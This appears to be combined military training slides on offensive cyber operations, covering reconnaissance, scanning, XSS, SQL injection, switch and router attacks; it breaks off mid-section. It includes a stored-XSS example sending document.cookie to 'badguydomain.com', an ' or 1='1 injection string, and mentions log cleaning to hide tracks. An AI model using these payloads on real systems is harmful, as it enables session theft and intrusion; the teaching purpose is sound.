combined_security.pdf

INFORMATION GATHERING V1.5: 8/25/23 OBJECTIVES Describe Nslookup ○ Students will be able to accurately describe the purpose and offensive usage of nslookup as a utility, to include its related query types. Describe Dig ○ Students will be able to accurately describe the purpose and offensive usage of dig as a utility, to include its related query types and options. Describe Traceroute ○ Students will be able to accurately describe the traceroute command and its function as it relates to offensive cyber operations. Describe Ping ○ Students will be able to accurately describe the purpose of the ping command and understand its similarities and differences when compared to the Traceroute command. Describe the capabilities of Information Gathering and Target Development ○ Students will be able to accurately describe the purpose and capabilities of Information Gathering, as well as Target Development as they relate to offensive cyber operations. TLO KNOWLEDGE AND SKILLS Conditions: Given a classroom, applicable references, and a practical exercise, the Cyber Mission Force student will demonstrate an understanding information gathering methods and procedures. Knowledge: Understand nslookup and dig along with their capabilities and functions. Understand the capabilities and function of traceroute Understand the importance of enumeration Understand and identify the cyber kill chain process Skills: Working knowledge of how to properly use the dig, nslookup and traceroute commands Identify information gathering tactics and techniques Effectively gather information about a target using the nslookup command NSLOOKUP Nslookup is a command that queries the Domain Name System servers for resource records. − Can be used on Windows and Linux OS’s. Nslookup can be utilized in interactive or non-interactive mode. − Interactive mode allows a user to execute queries back-to-back without typing the entire command for each query. − Non-interactive mode involves typing the entire command for each query. With a known domain name, nslookup will enumerate all IP’s correlated to that IP, aka DNS query. NSLOOKUP There is a browser based version of nslookup as well (nslookup.io), though we will be focusing on the CLI based version of the tool. NSLOOKUP This example is a standard nslookup, translating the DNS provided into an IP. Syntax: nslookup www..com Example: nslookup www.virustotal.com NSLOOKUP When you just type in “nslookup” into your terminal you will enter the interactive mode. Alongside the nslookup command, there are various options that we can choose from, that can provide more focused results. These next examples will be conducted in interactive mode. One example of these commands would be “ reverse nslookup” or a “reverse DNS” this simply Translates an IP address into DNS. If we wanted to run a reverse DNS on Google using nslookup it would look like this: Example: nslookup 8.8.8.8 For help: man nslookup NSLOOKUP nslookup -query=MX microsoft.com ○ This provides mail exchange records nslookup -query=NS microsoft.com ○ This provides name server records NSLOOKUP nslookup -query=SOA microsoft.com ○ This provides start of authority records nslookup -query=any microsoft.com ○ This provides all related records CHECK ON LEARNING True or False When conducting a Reverse DNS lookup nslookup command, it would look like nslookup www.google.com CHECK ON LEARNING What nslookup command provides mail server information? DIG Dig is a command that queries the Domain Name System servers for records relating to IP addresses, mail exchanges, and name servers. − The results from queries can be utilized to troubleshoot network issues. − The dig command resolves names through the resolver libraries that are located on the OS. Dig provides the user with more options, and more verbose answers. − When a DNS query is made, information is gathered from the DNS server indicated. − If the indicated server is not found then it will go through the list below until it identifies a source to query: 1. Specified DNS server 2. OS’s default resolver (I.e. resolv.conf) 3. Local host DIG Syntax: dig Example: dig virustotal.com For help: man dig Query Types: 1. ANY = All Pertinent Records 2. A = IPV4 Records 3. AAAA = IPv6 Records 4. CNAME = Canonical Name Records 5. MX = Mail Exchange Records SOA = Start of Authority Records 6. NS = Name Server Records 7. 8. PTR = pointer resource record DIG The results above indicate the following: 1. 1. Version of utility installed: 9.11.3-1 2. 2. Header indicates 1 query was made and 0 errors (NOERROR) occurred; and "id" indicates this query’s identification #. 3. 3. The DNS server replied with the results within "ANSWER SECTION," which includes google.com.'s IPV4 address (indicated by "A" and the IPV) 4. 4. "184" indicates the time to live (TTL) and "IN" represents internet class query 5. 5. Multiple IP’s may represent a load balancer DIG - Query Modifiers Just like nslookup, dig also has additional query options that can be beneficial when trying to locate specific information This example provides Mail Exchange Server Record Types: Example: $ dig microsoft.com MX This example provides IPV4 Record Types: Example: $ dig microsoft.com A DIG - Query Modifiers This example provides Name Server Record Types: Example: $ dig microsoft.com NS This example provides Start of Authority Record Types: Example: $ dig microsoft.com SOA DIG - Query Modifiers This example provides IPV6 Record Types: Example: $ dig microsoft.com AAAA This example provides ALL Record Types: Example: $ dig microsoft.com ANY DIG Options The following are common dig options: +short - Place this behind any request will display just the desired info. (Ex: DIG apple.com MX +short or DIG apple.com NS +short) +no comments - Turn off comment lines +noauthority - Turn off the authority section +noadditional - Turn off the additional section +noall - Turn off all sections +nostats - Turn off the stats section +noanswer - Turn off the answer section +trace - Trace the nameservers the queries are going to +answer - Turn on the answer section -X - Perform a reverse lookup -Axfr - Perform a DNS Zone transfer (This is commonly disabled due to security concerns) DIG - COMMON ERRORS Below is a list of common errors a dig query can return: NO ERROR - No errors SERVFAIL – Name queried exists, but no data or invalid data for that name at the requested authority NXDOMAIN – Name queried does not exist and no authoritative DNS data to be served REFUSED – Zone does not exist at the request authority and their infrastructure is not serving things that don’t exist at all CHECK ON LEARNING What dig command provides name server information? CHECK ON LEARNING What option performs a reverse lookup? TRACEROUTE The traceroute command is a diagnostic tool that is built into most operating systems and uses ICMP echo packets with variable time to live (TTL) values to print the trace between two points. ○ The trace is given by reporting all of the IPs of the routers that were pinged in between the source and destination points. ○ Traceroutes will allow a user to see the gateways a packet passes through to reach its destination. TRACEROUTE For help: man traceroute Syntax: traceroute Example: traceroute www.google.com CHECK ON LEARNING What command is used to print the trace between two point CHECK ON LEARNING What type of messages does traceroute use? ICMP PING The ping command is used to verify that a remote host is able to respond to network connections. While in some ways the ping command is similar to the traceroute command, the ping command will only tell us if the server is reachable and the time that it takes to transmit and receive data. Traceroutes on the other hand, will provide detailed and precise route information, router by router, and the time it took for each hop. PING Syntax: ping Example: ping 8.8.8.8 CHECK ON LEARNING True or false: The ping command tells us if the server is reachable and the time that it takes to transmit and receive data True CHECK ON LEARNING True or false: Ping commands provide more accurate information that traceroutes. INFORMATION GATHERING AND TARGET DEVELOPMENT The methodology of performing penetration testing or cyber-attacks have been broken down by many organizations. One example of this is the Cyber Kill Chain framework, which consists of 7 steps: Reconnaissance Weaponization Delivery Exploitation Installation Command & Control (C2) Action on Objectives There are other cyber kill chain-esque concepts, like the MITRE Att&ck framework; that may have more or less phases, but they all include reconnaissance, aka information gathering. INFORMATION GATHERING AND TARGET DEVELOPMENT When discussing offensive security, the nslookup and dig commands can assist in the process of enumeration. Enumeration is a technique that establishes a numeric understanding of the target and enables the identification and collection of important information about the target devices, users, networks and network resources; among other things. When we run an nslookup against a name servers or mail exchange servers, and multiple servers are retrieved, we can then begin to identify the number of servers that relate to the queried selector. This is just a basic example of enumeration, though we will cover additional topics later in the module to further elaborate on the importance of this concept. INFORMATION GATHERING AND TARGET DEVELOPMENT Information gathering involves gathering as much data as possible pertaining to a target(s). The amount of information gathered may determine the number of attack vectors that can be exploited. The key term for information gathering is identify, i.e. to establish or indicate the who’s and the what’s. These factors are the building blocks that drive offensive cyber operations. Without accurate and actionable intelligence, we cannot appropriately carryout offensive attacks. Information gathering can involve the following data to be enumerated. IP Addresses Protocols Users Credentials Scheduled Tasks / Cron Jobs Services Programs Functions/dll Files Opportunities Vulnerabilities INFORMATION GATHERING AND TARGET DEVELOPMENT Based on the information gathered from the reconnaissance phase of the Cyber Kill Chain, an analyst may be able to identify potential targets to satisfy mission objectives. Target development allows for the progression of steps 2-8 of the "Cyber Kill Chain." Target development includes the following: Understanding potential vulnerabilities to develop a method to obtain access, privilege escalate, D4M (deny, degrade, destroy, disrupt, manipulate), exfiltrate, obfuscation, persistence, and etcetera. It is critical to know WHO and WHAT your target is intimately. The more information we have on the target, the better we can plan operations and reach our end state mission requirements and goals. GATHERING AND TARGET DEVELOPMENT Target development includes the following: Understanding potential vulnerabilities in order to gain access, or perform one of the D4M’s, deny, degrade, destroy, disrupt, or manipulate. Obtaining or developing scripts, programs, functions/dlls, tools, or other methods to exploit vulnerabilities Planning when, where, and how to execute exploit Testing the tools and exploit/s in a controlled environment, other than the target. As a result, minimizing potential problems that may occur with the target during mission. One of the main terms to consider is exploit: Exploit is to take advantage of a flaw/s or vulnerabilities within an OS. The different types of exploitation include: Code - taking advantage of a flaw within a program’s instructions and manipulating it in a manner that was not intended by the creators. Misconfiguration - a system’s setting that allows it to be manipulated by an unintended source Human - poor OPSEC, cyber training, or restrictions in place. CHECK ON LEARNING True or False: Opportunities is one of the 7 phases of the Cyber Kill Chain CHECK ON LEARNING What type of exploitation consists of poor cyber training? Net Scan Enumeration V1.3: 8/25/23 OBJECTIVES Describe the Characteristics of Scanning and Enumeration ○ Students will be able to accurately describe the functions of both scanning and enumeration as they relate to offensive cyber operations, as well as their inherent differences. Define Passive Fingerprinting ○ Students will be able to accurately define passive fingerprinting, as it relates to fingerprinting operating systems and respective versions, application versions, port status and other fingerprints. Define Active Fingerprinting ○ Students will be able to accurately define active fingerprinting, as it relates to fingerprinting operating systems and respective versions, application versions, port status and other fingerprints. Define Port and Service Identification ○ Students will be able to accurately define port and service identification, as it relates to offensive cyber operations, Describe Nmap ○ Students will be able to accurately describe the Nmap application and its capabilities when used in an offensive setting for active fingerprinting, as well as its advantages and disadvantages. Describe Angry IP Scanner ○ Students will be able to accurately describe the Angry IP Scanner application and its capabilities when used in an offensive setting for active fingerprinting, as well as its advantages and disadvantages. Describe Banner Grabbing ○ Students will be able to accurately describe the purpose and functionality of banner grabbing, and its importance in an offensive setting. TLO KNOWLEDGE AND SKILLS Conditions: Given a classroom, applicable references, and a practical exercise, the Cyber Mission Force student will demonstrate an understanding of network scanning and enumeration. Knowledge: Identify the key ways to scan for information using both passive and active methods. Understand the tools employed for network scanning. Skills: Working knowledge of how to active and passively scan networks and gather information. Knowledge of banner grabbing and collecting information through this method Characteristics of Scanning and Enumeration Scanning and enumeration heavily enable reconnaissance, and information gathering. This intelligence can reveal vulnerabilities that cyber threat attackers can exploit and use as attack surfaces − Scanning is the process of collecting information without performing any analysis to identify a host, or obtain more details on a host. − Enumeration is performing cursory analysis on the data collected from scanning to identify one or more hosts, or gathering more information on a host to discover additional details on the target. The goal of enumeration is to establish a numeric understanding of the target and enables the identification and collection of important information about the target Successful enumeration and scanning can reveal possible Attack Surfaces and provide insight on the vulnerabilities that our targets attack surfaces are exposed to. − Attack surfaces are the set of points on the boundary of a system, a system element, or an environment where an attacker can try to enter, cause an effect on, or extract data from. − A Vulnerability is any weakness that exists within a targets device, software and/or network that can be exploited in order to deliver a payload and cause harm to the target. Characteristics of Scanning and Enumeration Fingerprints are a grouping of information that can be used to identify the software, network protocols, operating systems and the hardware that may be in use on a network. Passive fingerprinting is the recording, aka sniffing, and analysis of packet streams to determine hosts and network characteristics. − Passive collections will leave little to no evidence of the scans being performed by not interacting with host machines on the network. − This technique avoids the 4 D’s (deny, degrade, destroy, disrupting) to the network and host machines, and prevents alerts from occurring. Passive Fingerprinting Tools Wireshark Ettercap P0F Netsleuth CHECK ON LEARNING What process focuses on establishing a numerical understanding to collected information pertaining to a target network? CHECK ON LEARNING What is the process of collecting information without performing any analysis to identify or obtain more details on a host? Active Fingerprinting Active fingerprinting is the process of sending normal or malformed packets to a target, and monitoring it’s response. Active scans/fingerprinting, involve interaction with network machines, which may alert users on the network through logs, alerts, or artifacts left behind. Analyzing the target’s response may help fingerprint the target and determine the security measures that may have been placed. Pertaining to port scanning, 1 of 3 responses will be received: − Open, Accepted – host responds and awaits further instructions − Closed, Not Listening – port currently in use and unavailable − Filtered, Dropped, Blocked – host does not respond Active Fingerprinting Tools Some Active Fingerprinting tools that an attacker may use to gather information on a target network, include the following: Active Fingerprinting Tools NMAP Xprobe2 CronOS CHECK ON LEARNING What fingerprinting method is considered to be more overt? Active or Passive? CHECK ON LEARNING What three responses are provided when port scanning? Port and Service Identification Port and Service Identification is part of the fingerprinting process. − In the client-server communication relationship, the client has the ability to request one or more services from a server. The port numbers that are identified when analyzing network traffic between a server and client, can often reveal what services a client may be requesting from a server, and allows the client to know what services the server is sending back to the client. When utilizing this method use caution. − Remember, the ports may be set or modified by the administrator. An example of this would be if port 22 (ssh) was changed to port 2222 for security measures. Port and Service Identification Ports Services Possible OS 20-21 FTP FTP Server 22 SSH Lin OS These common ports are associated 23 TELNET NA with certain host machines and 25 SMTP Mail Server servers 53 DNS DNS Server 80 HTTP Web Server 88 Kerberos Auth Server 135 RPC Win OS 137-139 NetBios Win OS 443 HTTPS Web Server 445 SMB Win OS 3389 RDP Win OS 8080 HTTP Web Server CHECK ON LEARNING Analyzing what, can reveal services that a client is requesting from the server? CHECK ON LEARNING True or False: Port numbers are always static NMAP Nmap is a tool used to discover live hosts, services, network inventory, managing service upgrade schedules, monitoring host or service uptime, filters/firewalls, or specific operating systems by analyzing the response from the raw IP packets sent to a target system. CHECK ON LEARNING True or False: NMAP is a tool that can identify and fingerprint network hosts and devices from PCAP files captured from ethernet or WiFi data. CHECK ON LEARNING Nmap analyzes the response from what type of packets that are being sent to a target system? Angry IP Scanner ScanLine was a legacy command line port scanner dedicated to the Windows OS that utilized ICMP to conduct its scans and targeted all TCP and UDP ports. Today ScanLine no longer exists and the tools we use have a much broader scope and capability. Angry IP Scanner is an great GUI based alternative network scanning tool, that is able to function with ease on Windows, Linux and MacOS and provides the ability to quickly scan any range of IPs (as the name suggests), and ports, as well as various other functions. − Angry IP is powerful tool that is capable of providing a vast array of information about a target; revealing host names, MAC addresses, NetBIOS information (such as the computer name, workgroup name, and currently logged in Windows user), favorite IP ranges, detecting web servers, and more. Angry IP Scanner Angry IP Scanner was not designed with the sole purpose of being an offensive security tool; it lacks the ability to conduct stealth-scanning methods that other scanning tools are able to utilize. − This means that targeted networks and systems may be able to easily detect scanning if using Angry IP, as opposed to Nmap. The biggest advantages to Angry IP Scanner is the ease of use and flexibility that it provides to the user as a tool. Angry IP allows for the saving of favorite IP ranges, utilizes an easy to use GUI, uses multi-threaded scanning for faster response times and provides flexibility when exporting results into a CSV, TXT or XML file format. − This flexibility is also seen in the open source nature of the tool, which allows for easy customization of the source code, as well as the ability to use additional plug-ins to provide greater information returns. Angry IP Scanner CHECK ON LEARNING True or False: Angry IP Scanner is a cross-platform scanning tool that can uncover information about a target in an undetectable manner CHECK ON LEARNING What operating system can Angry IP Scanner run on? Banner Grabbing Banner grabbing is the act of obtaining software banner information, either manually or using tools that perform this function automatically. Services like FTP servers, web servers, SSH servers and other systems expose confidential information like software names, versions and the OS it is running. − All of this information is known as banner data. If an attacker can grab this banner data, it could easily lead them to vulnerabilities that they can exploit against their target. Banner Grabbing Within banner grabbing, there are two different techniques Active banner grabbing, and Passive banner grabbing. Active Banner Grabbing is the most widely used method of grabbing banner data. − This is active because the connection is logged in the remote system. This method can often times, be detected by intrusion detection systems, and therefore is much more overt. Passive Banner Grabbing provides nearly as much information, yet is able to avoid the exposure and scrutiny from the origin connection. Banner Grabbing Tools The following tools, functions or protocols can be used to perform banner grabbing. Netcraft Netcat Nmap Wikto Nikto Telnet Wget cURL Burp Suite Dmitry CHECK ON LEARNING What is the act of gathering banner data either manually or through the use of tools? CHECK ON LEARNING True or False: Banner data consists of services like TP servers, web servers, SSH servers, software names, OS versions and open ports/ Client Side Attacks V1.2: 08/25/23 OBJECTIVES Describe Social Engineering ○ Students will be able to effectively describe social engineering and the capabilities that it provides to offensive cyber operations. Describe Cross Site Scripting ○ Students will be able to effectively and accurately describe the concept and effects of Cross Site Scripting, to include the various subtypes of Cross Site Scripting attacks. Describe SQL (Structured Query Language) Injections ○ Students will be able to effectively and accurately describe the concept and effects of the SQL Injection and its various subtypes. Explain Client Side Attacks ○ Students will be able to effectively explain the usage and importance of client side attacks in an offensive setting, especially as it pertains to content spoofing types of attacks. TLO KNOWLEDGE AND SKILLS Conditions: Given a classroom, applicable references, and a practical exercise, the Cyber Mission Force student will demonstrate an understanding of client side attacks. Knowledge: Identify the different types of social engineering. Understand how scripting and SQL can be modified. Skills: Working knowledge of how to insert code and scripting to affect how services run. Knowledge of client side attacks and their offensive impact Social Engineering Social Engineering utilizes deception and manipulation to perform an action or reveal information that may compromise a target. − Social engineering is one of the most popular and successful tactics used when exploiting a target. While social engineering in and of itself is not inherently technical, it presents a great deal of opportunity as an attack vector for exploits when conducting offensive cyber attacks. − Attack vectors are the pathways, methods or routes used by the attacker to exploit vulnerabilities and gain access to unauthorized networks or systems, in order to deliver a payload causing harm. Social Engineering The Social Engineering Toolkit is an application that is included with the Kali and ParrotOS distributions of Linux. − The SE Toolkit contains a compilation of applications to enable target network access through various social engineering methods. Social Engineering Watering hole(s) refer to websites that are popular and frequently visited. Watering Hole Attacks are targeted social engineering attacks where a website is chosen due to its frequent visitors and then compromised, while the attacker waits for users to show up and to infects the sites visitors with malware. − Targets can also be lead to a watering hole as well through social engineering tactics. Watering Hole Attacks often utilize Cross-Site Scripting and SQL Injection as a means of exploit. CHECK ON LEARNING What application contains various scripts that enable target network access through social engineering? CHECK ON LEARNING What is a website that is targeted based on the amount of users that frequent it known as? Cross Site Scripting (XSS) Cross-Site Scripting (XSS) is a type of injection exploit, where malicious scripts are injected into a trusted website. This occurs when an attacker sends malicious code, usually as a browser side script to another user through a web application. When an attacker conducts cross-site scripting and sends a malicious script to an end user, the browser that the end user is using, will execute the script, believing it to be legitimate. − XSS exploits primarily utilize Javascript, though XSS exploits have been known to also use VBScript, ActiveX, Flash and CSS. Any web page or web app is vulnerable to XSS if it allows for unsanitized user input in the output that it generates. The victims browser will parse through this information without noticing any malicious action thus becoming vulnerable to an attack. Cross Site Scripting (XSS) XSS can lead to: − Identity Theft − Access of sensitive or restricted information − Collection of user cookies, and user credential enumeration − Altered browser function There are several types of cross-site scripting, Reflected XSS, Stored XSS, Blind XSS and DOM Based XSS; however none of these types are absolute as there is some overlap between the two. Because of the existing overlap, they have now been narrowed down into two further categories: − Server XSS − Client XSS. Cross Site Scripting (XSS) Reflected XSS is a type of XSS where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable web site, which reflects the attack back to the user’s browser. The browser then executes the code because it came from a "trusted" server. − Reflected XSS is also sometimes referred to as Non-Persistent or Type-I XSS." Reflected Cross Site Scripting (XSS) Cross Site Scripting (XSS) Stored XSS is a type of XSS where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. − Stored XSS is also sometimes referred to as Persistent or Type-II XSS. Stored XSS can be more dangerous because it does not require a user to click on a malicious link, but instead to simply visit the trusted website. − Stored XSS can be used to keylog, gather session information, or deploy malicious payloads to visiting users. Stored Cross Site Scripting (XSS) An example of a stored XSS might be one that creates an iframe or image and adds it in the background of the page. The iframe could load a URL such as "http://badguydomain.com/?" + document.cookie and exfiltrate all of the visitor’s cookie information. Cross Site Scripting (XSS) Blind XSS is a type of persistent XSS that typically takes place when the payload that is used by an attacker is saved on to the server and is reflected back to the victim via the backend. Cross Site Scripting (XSS) DOM Based XSS (type 0) is a type of XSS where both the source of data is in the DOM, but the sink is also in the DOM and the data flow stays contained within the browser and never leaves. An example of this would be the source (where malicious data is read) is a URL of a page or an element of the HTML, and the sink is a sensitive method of call which executes malicious data − The Document Object Model (DOM) defines the logical structure of documents and the way a document is accessed and manipulated. Cross Site Scripting (XSS) Cross Site Scripting (XSS) Server XSS exists when data that is provided by an untrusted user and is then included in an HTTP response that is generated by the server. Because the source of this data could be from either the request, or a stored location; it could be both Reflected Server XSS and Stored Server XSS. − The vulnerability is in server-side code, with the browser rendering the response and executing any valid script that is on it. Client XSS exists when data that is provided by an untrusted user and is then used to update the DOM with an unsafe JavaScript call. An "unsafe JavaScript call" is unsafe if it it used to introduce valid script to the DOM. The source of this data could be the DOM or the server. − Because this data could have been supplied by either a request or from a stored location on the client or server, it could be considered Reflected XSS and Stored Client XSS. Cross Site Scripting (XSS) The Browser Exploitation Framework (BeEF) is a powerful open source security framework that can work as a standalone application or be integrated with MetaSploit and provides attackers with client-side attack vectors, exploiting vulnerabilities within the browser that a user is utilizing on a host machine on the target network. − BeEF does this through hooking one or more web browser into itself for the purpose of launching direct command modules. Because each browser potentially has differing vulnerabilities that are attributed to it, this provides attack vectors specific to the certain browsers. One of the most noteworthy capabilities that BeEF has to offer is the ability to both scan for XSS vulnerabilities using the XSS Rays Scanner function and deliver XSS payloads. Cross Site Scripting (XSS) In addition to XSS scanning and attacks, BeEF can also perform several other functions that fall into these categories: − Social Engineering: BeEF is capable of various Social Engineering attacks, typically these attacks often utilize phishing components and combine them with popups, redirects and other means to obtain user credentials, and/or redirect the user to a malicious web page or download a malicious document/file while appearing to come from a legitimate source. − Information Gathering / Network Discovery: BeEF can fingerprint the browser, obtain software information and registry keys, the IP address and geolocation of a host system, as well as network fingerprinting, DNS enumeration, port scanning, amongst other capabilities. CHECK ON LEARNING What exists to assist in mitigating any confusion between cross-site scripting types? CHECK ON LEARNING True or False: DOM based XSS is a subset of Client XSS SQL (Structured Query Language) Injection Websites retrieve updated data from databases and other external sources. When a user requests information, the application initiates a query of the database to retrieve the requested information. − SQL or the Structured Query Language, is a programming language that is used to manipulate datasets and manage these databases. SQL servers are vulnerable as a result of a lack of input validation, failed error handling and the failure to suppress error messages. − Because of the ability to accept user input on some occasions, an attacker could "inject" SQL code into the input data from the client to the application with malicious intent, to exploit any SQL related vulnerabilities that may exist. SQL (Structured Query Language) Injection There are four types of SQL injection attacks: − Simple SQL Injection: Occurs when invalid input is submitted to the database to fail − Union SQL Injection: Uses UNION SELECT to Collect data from the database − Error-Based SQL Injection: Occurs when an invalid statement is submitted to cause the database to fail and output information − Blind SQL Injection: Occurs when the database is vulnerable but configured to suppress error messages. Statements are generated in effort to prompt a response. SQL (Structured Query Language) Injection Below is a list of several basic SQL commands, and their functions. These commands allow for the manipulation of the data stored within the database: − Select: Selects the data to be queried − Insert: Used to add a row into a table − Update: Updates an existing record to a new value − Delete: Remove a record from a table − From: Used to identify table to be searched or manipulated − Union: Joins select statements − Where: Sets up a condition SQL (Structured Query Language) Injection SQL Injection Example: − An attacker is attempting the exploit the "User ID" input field within a web application. This field allows requires the user to input their User ID. The User ID field expects a number and word entry, that it will then associate with a database on the backend. − The attacker will enter a character that the database is likely unable to handle. In this example the attacker inputs an apostrophe, as this is often used to test for SQL vulnerabilities. This lets the attacker know if this field is vulnerable to SQL injection. − Once the attacker realizes that the field is susceptible to a SQL injection attack, the attacker then enters SELECT FirstName, LastName FROM users WHERE ID=' or 1='1; This will then output information for all users. SQL (Structured Query Language) Injection SQL (Structured Query Language) Injection SQLMap is a tool that can enable an attacker to easily perform a SQL injection attack. Sqlmap automates detection for and exploiting SQL injection vulnerabilities. − Within sqlmap exist a large detection engine, a multitude of features and a vast range of other capabilities, to include database fingerprinting, over data fetching from the database, and the ability to access the underlying file system and execute commands on the OS through out-of- band connections. CHECK ON LEARNING True or False: Websites that accept user input to query SQL databases can also be vulnerable to exploit CHECK ON LEARNING What SQL injection method occurs when an invalid input is submitted to the database to fail? Client Side Attacks The goal of client-side attacks, is to penetrate the "human firewall", which is the comprised of a network’s end users. Social engineering is often implemented as a way to profile and manipulate these end users into performing tasks that expose the network from within. − Because these types of attacks occur within the network, they bypass most perimeter security defenses that would otherwise thwart such actions from taking place. Client Side Attacks There are typically two main types of client-side attacks; Cross-site Scripting, which we discussed earlier in this module, and Content Spoofing. − The goal of content spoofing or "content injection" is to convince a user that certain content on a website is legitimate and local, not appearing to be from an outside source. Content Spoofing is an attack that targets a user through a web app inject vulnerability. − This occurs when an application doesn’t properly handle user provided data and allows the attack to supply their own content to a web app. − This is usually done by using a parameter value that is reflected back to the user. This provides the target with a modified webpage, though they believe it to be legitimate. Client Side Attacks (HTML Injection Example) HTML Injection is a form of content spoofing where an attacker injects arbitrary HTML code into a vulnerable web page in order to obtain login credentials. user session cookies to pose as the target or modify the page content that visitors will see. Attacker discovers injection vulnerability and spoofs a login form − Attacker identifies an injection vulnerability and spoofs a login form − The attacker crafts a malicious link that includes their injected HTML content and sends it to the targets email − The target visits the page, believing that it is in a trusted domain − The attacker’s injected HTML is rendered and presented to the target, and asks for logon credentials − The target process the logon credentials, which are then sent to the attacker Client Side Attacks (Text Injection Example) Text Injection is another method of a content spoofing attack. An example of this would be the presentation of false information to a target through the manipulation of text. − Attacker identifies a web app that provides stock recommendations to users, assisting in the decision of buying or selling certain stocks. − The attacker identifies a vulnerable parameter − The attacker crafts a malicious link by modifying a valid request − The malicious link is then sent to the target for the target to eventually click − A valid web page is created using the attackers malicious recommendation and the target then purchases or sells stocks within their portfolio based on these recommendations. CHECK ON LEARNING True or False: Cross-Site Scripting and and Content Spoofing are synonymous with each other. CHECK ON LEARNING What are two Content Spoofing Methods? Network Device Security Concepts V2.1: 8/25/23 OBJECTIVES Define Switch Exploitation ○ Students will be able to accurately define the process of switch exploitation as it relates to offensive cyber operations. Define Router Enumeration ○ Students will be able to accurately define the process of router enumeration, as it relates to offensive cyber operations. Define Router Exploitation ○ Students will be able to accurately define the process of router exploitation, as it relates to offensive cyber operations. Define Router Reconnaissance ○ Students will be able to accurately define the process of router reconnaissance, as it relates to offensive cyber operations. Define Router Collection ○ Students will be able to accurately define the process of router collection, as it relates to offensive cyber operations. Define Firewall Enumeration ○ Students will be able to accurately define the process of firewall enumeration, as it relates to offensive cyber operations. Describe Network Device Security Concepts ○ Students will be able to effectively describe the concepts of network security devices one may find on a target network when conducting offensive cyber operations. TLO KNOWLEDGE AND SKILLS Conditions: Given a classroom, applicable references, and a practical exercise, the Cyber Mission Force student ill demonstrate an understanding of network device security concepts. Knowledge: Identify the different ways routers can be exploited Understand how switches can be used for exploitation Skills: Working knowledge of to best exploit routers and switches in order to gain information Knowledge of how to best secure routers and switches from outside attacks Switch Exploitation Switches exist to connect devices on a network by using packet switching to receive and forward data to the destination device. Switches are an integral component on the network, preventing traffic collision and providing the capability to control who has what accesses to different parts of the network. − When exploited, switches are able to be manipulated and configured in a way that allows for network packet sniffing. Dsniff is an open-source collection of tools for network auditing and penetration testing (hacking into a network), and is one of many tools that can be used to sniff network traffic and passwords. Switch Exploitation Macof is a utility within the Dsniff collection, that is capable of conducting an attack known as Mac Flooding. − MAC flooding is an attack that attempts to overload a switch by sending the targeted switch network traffic with different source MAC addresses. − When the target switch receives a new frame with an unknown MAC, the switch will add it into its MAC Address Table(MAT). − If the switch receives thousands of theses new MAC addresses, eventually the MAT will become filled and will not be able to add any more additional devices, and then can not start directing individual frames anymore. The switch no longer is able to keep track of where these devices are and will then begin sending traffic to every interface that is on the switch, reducing the switch to a hub. − This enables an attacker to utilize a packet analyzer to easily capture packets and see anything on the network. During a MAC Attack can also shut down entirely, this is known as fail-open repeating mode and is a type of Denial-of-Service. Switch Exploitation Switch Exploitation ARP Poisoning (aka ARP Spoofing) is a type of exploit at the switch that consists of compromising the ARP table by manipulating the MAC addresses so that IP addresses will point to another machine. − This is considered to be a type of Man-In-The-Middle(MITM) attack, where the ARP cache is poisoned and all packets are sent to the access point. Switch Exploitation CHECK ON LEARNING (True or False) ARP Spoofing can be considered a Man-In-Middle Attack? CHECK ON LEARNING What type of attack attempts to overload the MAT on a switch? Router Enumeration & Reconnaissance When an attacker is able to gain access to a router, they are able to potentially capture, block and redirect traffic that flows across the network. Before gaining access to a target router, enumeration must first be done. − The scanning methods that are used to enumerate routers, are the same methods that are used to enumerate any host target. IP addresses are scanned to identify available ports and services. Banner grabbing can also be used to identify the service version of ports that have been discovered. Router reconnaissance provides a great amount of detailed information about the target router and situational awareness surrounding the target router and its environment. Router Enumeration & Reconnaissance SNMP or Simple Network Management Protocol, is an application layer protocol that runs on UDP and is utilized to manage network devices that run on the IP Layer (i.e. Routers) Two passwords are used by SNMP in order to authenticate agents before configuring the variables and accessing the SNMP agent from the management. − SNMP passwords: Read community strings are public and the device configuration of the device can be viewed with this password. Read/Write community strings are private. The device configuration is able to be modified with this password. The Management Information Database (MIB) is a virtual hierarchical database that is used by SNMP to internal manage network objects. SNMP passwords can be used to view and/or modify network objects. Router Enumeration & Reconnaissance SNMPwalk is an SNMP application that utilizes multiple GETNEXT requests, in order to search for and obtain SNMP data. It can be used as an enumeration tool gather to information that specifically pertains to routers. When port 161 (SNMP) is open and has a valid community string, router information is easily searchable. Router and SNMP enumeration can lead to the following: − Network resource information (Routers, devices, share drives, etc) − ARP and routing tables − Traffic Statistics − Network addressing topologies − Information about network owner and location of the routing device − Identify potential targets on network − Routing policies and rules − Implemented Security levels CHECK ON LEARNING What application can be used for router enumeration? CHECK ON LEARNING (True or False) Port 161 can provide router information? Router Exploitation Routers utilize packet data to direct the incoming and outgoing traffic that traverses across the network. Routersploit and various other penetration testing tools exist that can enable an attacker to gain access to routers on a targeted network. − If vulnerable, the attacker can potentially gain persistent access to the target network through the router, as well as enable and disable services on the accessed router and misconfigure files. Router Exploitation Remote Logging capabilities of the router are controlled by logging statements. These logging statements identify the IP address of the host that is storing the logs. Exploiting the host can also provide the attacker with the ability to enable log cleaning. This can be very beneficial when an attacker attempts to cover some of their tracks. Router Scan is an application that is a penetration testing tool, that is used to exploit and identify various devices based on a large number of known routers. Router Scan collects critical information on wireless networks (and WANS), like wireless network characteristics, encryption types, model of router, SSIDs and access point key passphrases. − Router Scan gathers information using two main methods: Guessing a username/password pair to gain access to the router. Exploiting vulnerabilities that exist on specific router models, obtaining target information and possibly bypassing authorization procedures. Router Exploitation RouterSploit is an open source exploitation framework designed to primarily detect and exploit router vulnerabilities. At first glance Router Scan and RouterSploit appear to be the same on the surface, they certainly have their differences. − RouterSploit utilizes a CLI instead of a GUI, and requires goals to be manually set and does not all for a set subnet, all targeted routers must be individually specified. − RouterSploit has more exploits than RouterScan and is more robust. It also supports the ability to brute force multiple network services. CHECK ON LEARNING Exploiting a router can enable allow the attacker to cover their tracks by cleaning what? CHECK ON LEARNING What CLI based tool can be used for the purposes of router exploitation? Router Collection Router Collection is an information gathering method, where an attacker gathers pertinent information about a target router. − Router configuration files are often a prime target for information gathering operations. Cisco Routers utilize two main copies of configuration files; startup and running configurations. − The Startup configuration file or "Startup config" is a persistent copy of Cisco Router Configurations and 